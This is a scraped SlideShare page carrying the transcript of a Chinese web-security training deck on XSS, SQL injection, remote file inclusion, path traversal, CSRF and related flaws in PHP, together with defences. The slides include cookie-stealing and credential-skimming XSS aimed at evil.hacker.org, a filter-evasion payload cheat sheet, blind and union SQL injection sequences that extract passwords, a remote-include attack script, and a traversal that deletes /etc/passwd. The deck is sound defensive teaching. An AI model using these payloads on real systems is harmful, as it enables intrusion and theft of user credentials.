Your SlideShare is downloading. ×
Web安全解决方案V1.0
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Saving this for later?

Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime - even offline.

Text the download link to your phone

Standard text messaging rates apply

Web安全解决方案V1.0

3,078
views

Published on

Published in: Technology

0 Comments
18 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,078
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
18
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • Transcript

    • 1. Penetration test Software developer Security analyst Security consultation Whatever
    • 2. 跨站攻击 注入攻击 远程文件执行 CSRF 攻击 访问控制缺陷 配置错误 数据存储不安全 直接对象参考不安全 认证和会话管理不完善 通信不安全
    • 3. 入侵技术交流 防御 XSS
    • 4.  
    • 5. 1. 攻击者向服务器插入恶意代码 2. 数据库存储恶意代码 姚明… 3. 互联网用户点击主题 4. 数据传送给互联网用户 5. 浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… 郑智… 郭晶晶… 中国队 ..... 攻击者、弱点网站、互联网用户的 互动游戏 Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    • 6. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... cookies Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    • 7. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... phishing username/password Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    • 8. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... spoofed Server Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    • 9. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶 中国队 ..... botnet Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    • 10. <?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=Wong_Bin <HTML> <Body> Welcome Wong_Bin </Body> </HTML>
    • 11. <?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=<script>alert(&quot;XSS&quot;)</script> <HTML> <Body> Welcome <script>alert(&quot;XSS&quot;)</script> </Body> </HTML>
    • 12. <Font size=5> Update your email address</ font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;search&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </ form> <?php ... $email = $_GET['email']; $query = &quot;update user set email='$email' where name='wong'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success update... &quot;; } ?> <?php ... $query = select email from user where name = 'wong' $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_result ($db_query, 0); if ($db_resutl) { echo &quot;<p>EMAIL Address:$ db_resutl <p>&quot;; } ?> <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> [email_address] Update your email address 确定
    • 13. <Font size=5> Update your email address</ font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;search&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </ form> <?php ... $email = $_GET['email']; $query = &quot;update user set email='$email' where name='wong'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success update... &quot;; } ?> <?php ... $query = select email from user where name = 'wong' $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_result ($db_query, 0); if ($db_resutl) { echo &quot;<p>EMAIL Address:$ db_resutl <p>&quot;; } ?> <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> huangbin@nsfocus.com<script>document.location ='http://evil.hacker.org/steal_cookies.php?cookies=‘%20+encodeURI(document.cookie);</script> http://evil.hacker.org. Steal Cookes!!! Update your email address 确定
    • 14. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> <HTML> 欢迎来到奥运论坛! 用户名: 密 码: </HTML> 刘翔… ..... 郑智… ..... 郭晶晶 ..... 中国队 ..... User_information.txt 记录用户名和密码 奥运论坛 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241 输入用户名、密码。登陆……
    • 15. … <body background=javascript:evil=document.createElement(&quot;script&quot;);evil.src=&quot;http://evil.hack.org/xss.js&quot;;document.body.appendChild(evil);> … <SCRIPT language=JavaScript> function Phishing() { evil_code = Make a Phishing Page by … document.write(evil_code); } Phishing() </SCRIPT> ... <form>action=&quot;user_infomation.php&quot; method=&quot;post&quot; onsubmit=&quot;evilImg=new Image; evil.src='http://evil.hacker.org/'+document.forms(1).login.value'+':'+ document.forms(1).password.value;&quot;</form> ... <?php if (isset($_POST['username']) && isset($_POST['password'])) { $filename = &quot;/www/user_information.txt&quot;; $file = @fopen($file_path, &quot;a&quot;); $info = &quot;user: &quot;.$_POST['username'].&quot; passwd:&quot;.$_POST['password'].&quot; &quot;; @fwrite($file, $info); @fclose($file); } ?> Phish Attacker Client 请重新登陆 用户: 密码: 确定 取消
    • 16. <INPUT TYPE=&quot;image&quot; SRC=&quot;http://example&quot;><script>alert('xss')</script> <INPUT TYPE=&quot;image&quot; SRC=&quot;http://example&quot;>
        •  Normally
        •  Evil
    • 17.
        •  Danger
      replace(str,&quot;<&quot;,&quot;&lt;&quot;) replace(str,&quot;>&quot;,&quot;&gt;&quot;) ‘ <script.*>’
        •  Weak
    • 18. <INPUT TYPE=&quot;image&quot; SRC=javascript:alert(&quot;xss&quot;) >
        •  Evil
      Dim re     Set re=new RegExp     re.IgnoreCase =True     re.Global=True re.Pattern=&quot;javascript:&quot;     Str = re.replace(Str,&quot;javascript : &quot;)     re.Pattern=&quot;jscript:&quot;    Str = re.replace(Str,&quot;jscript : &quot;)     re.Pattern=&quot;vbscript:&quot;    Str = re.replace(Str,&quot;vbscript : &quot;) set re=nothing
        •  N ot so good
        •  Danger
      javascript:
    • 19. <INPUT TYPE=&quot;image&quot; SRC=javascript&#58alert(&quot;xss&quot;)>
        •  Evil
        •  Danger
      ‘ & ’ replace(str,&quot;&&quot;,&quot;&amp;&quot;)
        •  Weak
    • 20. <img src=&quot;javas cript:alert('xss')&quot;>
        •  Evil
        •  Danger
      replace(str,“ ”,“&nbsp; “)
        •  Weak
    • 21. http://example/weak.php?username=%3A%69%6E%70%75%74%21%74%79%70%65%3D%68%69%64%64%65%6E%20%76%61%6C%75%65%3D%47%6F%74%63%68%61%21%20%6E%61%6D%66%20%3D%20%78%3E%20%3C%73%63%71%69%71%74%3E%20%61%6C%65%72%71%28%78%2C%76%61%6C%75%65%29%27%3C%2F%73%63%72%69%70%74%3E%4A%69%6C http://example/weak.php?username=<input type=hidden value=v name = x> <script>alert(x.value)</script>Wrong
        •  Evillooking
    • 22. function safe_html($msg) { $msg = str_replace('&amp;','&',$msg); $msg = str_replace('&nbsp;',' ',$msg); $msg = str_replace('&quot;','&quot;',$msg); $msg = str_replace(&quot;'&quot;,'&#39;',$msg); $msg = str_replace(&quot;<&quot;,&quot;&lt;&quot;,$msg); $msg = str_replace(&quot;>&quot;,&quot;&gt;&quot;,$msg); $msg = str_replace(&quot; &quot;,&quot; &nbsp; &nbsp;&quot;,$msg); $msg = str_replace(&quot; &quot;,&quot;&quot;,$msg); $msg = str_replace(&quot; &quot;,&quot; &nbsp; &quot;,$msg); return $msg; } Danger input Encoding input
    • 23. <img src=&quot;#&quot; onerror=alert(/xss/)>
        •  Evil
      <img src=&quot;#&quot; style=“evil:expression(alert(/xss/));&quot;> <img src=&quot;#&quot;/**/onerror=alert(/xss/) >
        •  Evil
        •  Evil
    • 24. HTML 表单 WEB 程序 数据库 WEB 程序 浏览器    
    • 25. HTML 表单 WEB 程序 数据库 WEB 程序 浏览器  replace(str, safer, danger) …… ……
        • 事前
      Htmlspecialchars ($html, ENT_QUOTES) ……
        • 事中
      FireFox no script …… ……
        • 事后
    • 26.
        •  Danger
        •  Danger
    • 27. POST / thepage.jsp?var1=page1.html HTTP/1.1 Accept: */* Referer: http:// www.myweb.com/index.html Accept-Language: en-us,de;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-url-encoded Content-Lenght: 59 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www. myweb.com Connection: Keep-Alive uid=fred&password=secret&pagestyle=default.css&action=login
        • Danger
    • 28. ‘ <script.*>’ <table background=javascript:evil()> <tr background=javascript:evil()> <body background=javascript:evil()>
    • 29. <input type='image' src=javascript:evil()> <img src='javascript:evil()’> <frameset> <frame src=&quot;javascript:danger()&quot;>...
    • 30. <link rel=&quot;stylesheet” href=javascript:evil()> <base href=javascript:evil()>
    • 31. <meta http-equiv=&quot;refresh“ content=&quot;0;url=javascript:danger()&quot;> <p style='background-image: url(&quot;javascript:danger();&quot;)'); <a href='javascript:danger();'>
    • 32. <body onload='danger();'> <div onmouseover='danger();'> <div onscroll='danger();'>
    • 33. <div onmouseenter='danger();'>
    • 34. <object type=&quot;text/x-scriptlet“ data=&quot;evil.com/danger.js&quot;> <style>@import evil.com/danger.js</style> <div style=&quot;width:expression(danger();)&quot;>
    • 35. [IE] <div style=&quot;behaviour: url( [link to code] );&quot;> [Mozilla] <div style=&quot;binding: url( [link to code] );&quot;> [IE] <div style=&quot;width: expression( [code] );&quot;> [N4] <style type= &quot;text/javascript&quot;>[code] </style> [IE] <object classid=&quot;clsid:...&quot; codebase=&quot;javascript:[code]&quot; > <style><!--</style> <script>[code]//--></script> <![CDATA[<!--]]> <script>[code]//--></script> <!-- -- --> <script>[code]</script> <!-- -- --> < <script>[code]</script> <img src=&quot;blah&quot;onmouseover=&quot; [code] &quot;> <img src=&quot;blah>&quot; onmouseover=&quot; [code] &quot;> <xml src=&quot; javascript:[code] &quot;> <xml d=&quot;X&quot;><a><b> &lt;script>[code]&lt;/script> ; </b></a> </xml> <div datafld=&quot;b&quot; dataformatas=&quot;html&quot; datasrc=&quot; #X &quot;></div> [UTF-8; IE, Opera] [xC0][xBC]script>[code][xC0][xBC]/script> <a href=&quot; javas&#99;ript&#35;[code] &quot;> <div onmouseover=&quot; [code] &quot;> <img src=&quot; javascript:[code] &quot;> [IE] <img dynsrc=&quot; javascript:[code] &quot;> [IE] <input type=&quot;image&quot; dynsrc=&quot; javascript:[code] &quot;> [IE] <bgsound src=&quot; javascript:[code] &quot;> & <script>[code]</script> [N4] &{ [code] }; [N4] <img src=&{ [code] };> <link rel=&quot;stylesheet&quot; href=&quot; javascript:[code] &quot;> [IE] <iframe src=&quot; vbscript:[code] &quot;> [ N4] <img src=&quot; mocha:[code] &quot;> [N4] <img src=&quot; livescript:[code] &quot;> < a href=&quot;about: <s&#99;ript>[code]</script> &quot;> <meta http-equiv=&quot;refresh&quot; content=&quot;0;url= javascript:[code] &quot;> <body onload=&quot; [code] &quot;> <div style=&quot;background-image: url( javascript:[code] );&quot;>
    • 36. Htmlspecialchars() Htmlspecialchars() Strip_tags() $str = strip_tags($_POST['message'], '<b><p><i><u>'); $str = htmlentities($str); echo nl2br($str);
    • 37. <?php $html = '<p><i><s>Welcome to Nsfocus!</i></p></s>'; print strip_tags($html); print ‘ ’; // Allow <p><i><s> print strip_tags($html, '<p><i><s>'); ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; print strip_tags($html); print &quot; &quot;; // Allow <script> print strip_tags($html, '<script>'); ?> Welcome to Nsfocus! alert(&quot;xss attack!!&quot;)
    • 38. <?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $html.&quot; &quot;; print $new_html; ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $new_html.&quot; &quot;; print $html; ?> evil link alert(&quot;xss attack!!&quot;) <a href='test'>Test</a>
    • 39. <?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $html.&quot; &quot;; print $new_html; ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; $new_html = htmlentities($html, ENT_QUOTES,’UTF-8’); // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt; print $new_html.&quot; &quot;; print $html; ?> evil link alert(&quot;xss attack!!&quot;) <a href='test'>Test</a>
    • 40. $_FILES['message'] $_GET['message'] $_REQUEST['message'] $_POST['message'] $HTTP_GET_VARS['message'] More… $_COOKIE['message'] $_ENV['message'] $_SESSION['message'] $_SERVER['message']
    • 41.  
    • 42. 入侵技术交流 防御 SQL Injection
    • 43.  
    • 44. ... <form action = &quot;login.php&quot; method = &quot;post&quot; name = &quot;login&quot;> 用户 :<input type = &quot;text&quot; name = &quot;username&quot; value = &quot;&quot; maxlength = &quot;20&quot;> 密码 :<input type = &quot;password&quot; name = “password&quot; value = &quot;&quot; maxlength = &quot;20&quot;> <INPUT TYPE=submit name = &quot;confirm&quot; value = &quot; 确定 &quot;> <INPUT TYPE=reset name = &quot;cancel&quot; value = &quot; 取消 &quot;> </form> ... <?php $query= &quot;select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ”; $db_query = mysql_db_query($dbname, $query); $db_resutl = mysql_fetch_array($db_query); if ($db_resutl) { print &quot;Success in... &quot;; } ?>
      select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’
      用户: 密码: 确定 取消
    • 45. select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ admin select * from user where username=‘admin’ and password=‘’ or ‘’=‘’ Success in… ‘ or’’=‘ 用户: 密码: 确定 取消
    • 46. select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ‘ ;Delete from users;/* select * from user where username=‘‘;Delete from users;/*… Success in…
        •  Worse
      用户: 密码: 确定 取消
    • 47. <Font size=5>Search page</font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/Search.php&quot;> <input type=&quot;text&quot; name=&quot;name&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </form> <?php $search_name = $_GET['search_name']; $ query = &quot;select * from user where username like ‘ %$search_name% ’ order by id desc&quot;; $db_query = mysql_db_query($dbname,$ query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print &quot;Search result... &quot;; } ?>
      select * from user where username like ‘ %$search_name %‘ order by id desc
      Search page: 确定
    • 48. select * from user where username like ‘%$search_name%‘ order by id desc select * from user where username like ‘%%‘ order by id #%’order by id desc All username show… %' order by id# Search page: 确定
    • 49. <Font size=5>Update your password</font> <form name=&quot;update&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;password&quot; size=20> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </form> <?php $passwd = $_GET[‘password ‘]; $query = “update user set passwd='$passwd' where uid='$uid'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success in update... &quot;; } ?>
      update user set passwd='$passwd' where uid='$uid'
      Update your password: 确定
    • 50. update user set passwd='$passwd' where uid='$uid' update user set passwd=‘123’ where uid =‘1’/*where uid =‘252’ Uid1 password chang Update your password: 123’ where uid = ‘1’/* 确定
    • 51. Get /query.php?name=Wong ' Get /query.php?name=Wong’ and LEFT(password,1)=‘i Web Server …
        • MYSQL SERVER 将 varchar 值“ luyq@#11” 转换时发生语法错误。 /show/query.php ,第 87 行
        • Password 是 luyq@#11
      Attacker FALSE FALSE
    • 52. Attacker Web Server Post /attacktarget?errors=Y&debug=5 Show more … Get /query.php?user=joe’ Error message: $debug = 1 …
    • 53. show_source() highlight_string() highlight_file() Other Show error message function…
        •  Take care
      error_reporting() Php.ini ------- display_errors = off
        •  Better
    • 54. 1. 判断注入点 MSSQL SERVER!! Get /query.asp?name=Wong ' Get /query.asp?name=Wong and 1=1 Get /query.asp?name=Wong and 1=2 Web Server Attacker FALSE TRUE FALSE
    • 55. Get /query.asp?name= Wong and (select count(*) from admin)>=0 Get /query.asp?name= Wong and (select count(user) from admin)>=0 Get /query.asp?name= Wong and (select count(username) from admin)>=0 … 1. 判断注入点 2. 探测数据库结构 MYSQLSERVER!! 表名 admin 字段 username.. Attacker Web Server TRUE FALSE TRUE
    • 56. Get /query.asp?name= Wong and (select top 1 len(username) from admin)>5 Get /query.asp?name= Wong and (select top 1 len(username) from admin)<10 Get /query.asp?name= Wong and (select top 1 len(username) from admin)=8 … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名长 5 位,密码长 8 位 3. 探测用户名和密码长度 Attacker Web Server TRUE TRUE TRUE
    • 57. Get /query.asp?name= Wong and 1= (select count(*) from admin where id=1 and mid(uaername,1,1)='a') Get /query.asp?name= Wong and 1= (select count(*) from admin where id=1 and mid(uaername,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名长 5 位,密码长 8 位 3. 探测用户名和密码长度 用户名: admin 密码 : jjyy@!&1 4. 探测用户名和密码 Attacker Web Server TRUE FALSE
    • 58. 1. 判断注入点 MYSQL SERVER!! Get /query.php?name=joe’ Get /query.php?name=joe’ and 1=1 Get /query.php?name=joe’ and 1=2 Web Server Attacker FALSE TRUE FALSE
    • 59. Get /query.php?name= joe’ and LENGTH(password)>‘5 Get /query.php?name= joe’ and LENGTH(password)<‘15 Get /query.php?name= joe’ and LENGTH(password) =‘13 … 1. 判断注入点 2. 探测密码长度 MYSQLSERVER!! 密码长 13 位 Attacker Web Server TRUE TRUE TRUE
    • 60. Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 Attacker Web Server FALSE TRUE FALSE
    • 61. Get /query.php?name= joe’ union select 1,1,1,1,1 from root_user/* Get /query.php?name= admin’ union select 1,1,1,1,1 from admin_user/* … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 密码长 12 位 密码是 ilovepassword 3. 探测用户名和密码长度 猜测到存放管理员信息的 admin_user 表 4. 探测其它表 Attacker Web Server FALSE TRUE
    • 62. Get /query.php?name= joe’and 1<>1 union select 1,1,name,1,1,passwd,1 from admin_user /* 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 密码长 12 位 密码是 ilovepassword 3. 探测用户名和密码长度 猜测到存放管理员信息的 admin_user 表 4. 探测其它表 用户名: admin 密码 : fly_you ! @# 5. 拿到用户名和密码 Attacker Web Server TRUE
    • 63. Get /query.php?name= -1’ union select 1,1,1,1,load_file('c:/boot.ini') C lient Web Server C:oot.ini
    • 64. 合法 数据长度检测 数据类型检测 数据字符检测 合法 合法 否 合法 出错提示 否 否
    • 65. 客户端检查、过滤 合法 错误提示 错误提示 服务器响应 服务端检查、过滤 合法 处理提交信息 攻击备案
        • 输入
        • 输入
      绕过客户端检查 否 是 是 否 客户端 服务端
    • 66. < > & ‘ “ + ; {Whitespace} % / # Danger !
    • 67. addslashes mysql_real_escape_strin PDO escapeshellarg escapeshellcmd magic_quotes_gpc register_globals safe_mode allow_url_fopen open_basedir disable_functions 注:解决方案少了,需要更多的时间去完成… …
    • 68. 入侵技术交流 防御 恶意文件执行
    • 69.  
    • 70. Web Server Attacker Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin. ...
    • 71. <?php include($_GET['file'].&quot;.php&quot;); ?> <?php print file_get_contents('/etc/passwd'); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt
    • 72. <?php include($_GET['file'].&quot;.php&quot;); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt <?php var_dump(get_defined_vars()); die(); ?>
    • 73. <?php include($_GET['file'].&quot;.php&quot;); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt <?php print &quot;Guess user & password demo &quot;; include('http://evil.hacker.org/userGuesses.php'); foreach($userGuesses as $user => $password) { $connection = @mysql_connect('localhost', $user, $password); if ($connection) { print &quot;Success with username: $user. Using password: $password &quot;; } } ?>
    • 74.
        •  Right
      allow_url_fopen allow_url_include($file)
        •  Advise
      <?php include($_GET['file'].&quot;.php&quot;); ?> <?php $page = array( 'contact' => 'contact.php', 'help' => 'help.php', 'query' => 'query.php'); if (array_key_exists($_GET['file'], $page)) { include('/full/path/'.$page[$_GET['file']]); } ?>
        •  Wrong
    • 75. Attacker Web Server Get /del.php?user=../etc&file=passwd Del /etc/passwd success Post file=passwd Success Post…
    • 76. <?php // 从用户目录中删除指定的文件 $username = $_GET['user']; $homedir = &quot;/home/$username&quot;; $file_to_delete = &quot;$userfile&quot;; unlink (&quot;$homedir/$userfile&quot;); echo &quot;$file_to_delete has been deleted!&quot;; ?> <?php // 删除硬盘中任何 PHP 有访问权限的文件 $ file_to_delete = $_GET[‘file’]; $username = &quot;../etc/&quot;; $homedir = &quot;/home/../etc/&quot;; $file_to_delete = &quot;passwd&quot;; unlink (&quot;/home/../etc/passwd&quot;); echo &quot;/home/../etc/passwd has been deleted!&quot;; ?> Get /del.php?user=../etc&file=passwd
    • 77.
        •  Right
        •  Better
      <?php $username = $_SERVER['REMOTE_USER']; // 使用认证机制 $homedir = &quot;/home/$username&quot;; $file_to_delete = basename(&quot;$userfile&quot;); // 去除变量中的路径 unlink ($homedir/$file_to_delete); $fp = fopen(&quot;/home/logging/filedelete.log&quot;,&quot;+a&quot;); // 记录删除动作 $logstring = &quot;$username $homedir $file_to_delete&quot;; fwrite ($fp, $logstring); fclose($fp); echo &quot;$file_to_delete has been deleted!&quot;; ?> <?php $username = $_SERVER['REMOTE_USER']; // 使用认证机制 $homedir = &quot;/home/$username&quot;; if (!ereg('^[^./][^/]*$', $userfile)) die('bad filename'); // 停止执行代码 if (!ereg('^[^./][^/]*$', $username)) die('bad username'); // 停止执行代码 ?>
    • 78.
        •  And
      只给 PHP 的 web 用户很有限的权限!
    • 79. <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; mail($to, $subject, $message, $from ); ?> To: [email_address] Subject: the subject From: [email_address] POST [email_address]
    • 80. <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; mail($to, $subject, $message, $from ); ?> To: [email_address] Subject: the subject From: [email_address] Bcc: [email_address] Reply-To: [email_address] … POST fake@example.org Bcc:evil@example.com Reply-To:evil2@example.com
    • 81. <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; if (! ctype_print ($headers)) { print &quot;Error post &quot;; } else mail($to, $subject, $message, $from ); ?>
        •  Right
      <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; if (! ctype_print ($headers)) { write_logs(IP MESSAGE); print “U IP has been log… &quot;; } else mail($to, $subject, $message, $from ); ?>
        •  Better
    • 82. 入侵技术交流 防御 CSRF
    • 83.  
    • 84. 1. 攻击者向服务器插入恶意代码 2. 数据库存储恶意代码 姚明… 3. 互联网用户访问网站 4. 互联网用户点击主题 5. 浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… 郑智… 郭晶晶… 中国队 ..... 192.168.1.10 6. 执行危险的操作 cookies 信任域 Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241 login Webpage+cookies evil
    • 85. Attacker Myspace
        • Post <div style=“background:url()”>
      Cool ! Post <script.*> 、 onclick, 、 <a href=javascript://> … False
        • Post <divstyle=“background:url(‘javascript:evil()’)”>
      False
        • Post <divstyle=“background:url(‘java script:evil()’)”>
      False
        • Post <divstyle=“background:url(‘java&#58script:evil()’)”>
      Cool!!!Hello,web worm!
    • 86. 入侵技术交流 防御 配置错误
    • 87. Web Server Attacker Get /config/horde.php.bak ... $conf['prefs']['driver'] = 'sql'; $conf['prefs']['params'] = array(); $conf['prefs']['params']['phptype'] = 'mysql'; $conf['prefs']['params']['hostspec'] = 'foo.bar'; $conf['prefs']['params']['username'] = 'root'; $conf['prefs']['params']['password'] = 'blabla'; $conf['prefs']['params']['database'] = 'horde'; $conf['prefs']['params']['table'] = 'horde_prefs'; ...
    • 88.
        •  Wrong
    • 89.
        •  Right
    • 90. php.ini register_globals: Off allow_url_fopen: Off magic_quotes_gpc: Off magic_quotes_runtime: Off safe_mode: On open_basedir: On displays_errors = off log_errors = on error_log = /var/log/php.log register_globals = off session.use_trans_sid = 0 open_basedir = /servers/www/foo.bar/ expose_php = off Must
    • 91. 入侵技术交流 防御 身份认证漏洞
    • 92. Attacker Web Server Post wrong username or passwd 用户名或密码错误 Get /login.php 用户: 密码: 确定 取消 Get /script.php?authorized=1 Success login in…
    • 93. <?php if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } ... ?> <?php $_SESSION['authenticated'] = false; if (authenticate_user()) { $_SESSION['authenticated'] = true; } if (!$_SESSION['authenticated']) { die(&quot;Authorization required&quot;); } ... ?>
        •  Wrong
        •  Right
    • 94.
        •  Better
        •  Advise
      <?php $_SESSION['authenticated'] = false; if (authenticate_user()) { $_SESSION['authenticated'] = true; } if (!$_SESSION['authenticated']) { mail(&quot;admin@example.com&quot;, &quot;Possible breakin attempt&quot;, $_SERVER['REMOTE_ADDR']); echo &quot;Security violation, Admin has been alerted.&quot;; exit; } ... ?> register_globals = off error_reporting(E_ALL);
        •  And
    • 95. <?php if (!isset($_SESSION['session_id'])) { $_SESSION['session_id'] = 1; } else { $_SESSION['session_id']++; } print “we can guest it ” ?>
        •  W rong
        •  Right
      <?php Session_start(); if (!isset($_SESSION['session_id'])) { $_SESSION['session_id'] = 1; } else { session_regenerate_id (); } print “we can guest it ” ?>
    • 96. 入侵技术交流 防御 存储缺陷
    • 97. Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(password,1,1)='a') Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(password,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名和密码长度 3. 探测用户名和密码长度 密码是 admin@#$%! 4. 探测密码 Attacker Web Server TRUE FALSE
    • 98. Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(uaername,1,1)=‘1') Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(uaername,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名和密码长度 3. 探测用户名和密码长度 HASH 值 120a1b2649c88aef29edd2ffd7359d73 4. 探测密码 Attacker Web Server TRUE FALSE
    • 99. Web Server Attacker Get /config/database.mdb Database.mdb Username | password Admin admin@#$%! …
    • 100. Web Server Attacker Get /config/database.mdb Database.mdb Username | password Admin 120a1b2649c88aef29edd2ffd7359d73 …
    • 101. admin@#$%! 0x120a1b2649c88aef29edd2ffd7359d73
        •  W rong
        •  Right
    • 102. <?php // 存储密码散列 $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?>
        •  Rigth
    • 103. md5(uniqid(rand(), true))
        • B etter than
      md5(uniqid(rand())
        •  C ookie
    • 104. Php.ini session.save_path
        •  S ession
    • 105. 攻击技术交流 防御 HTTP 数据传输
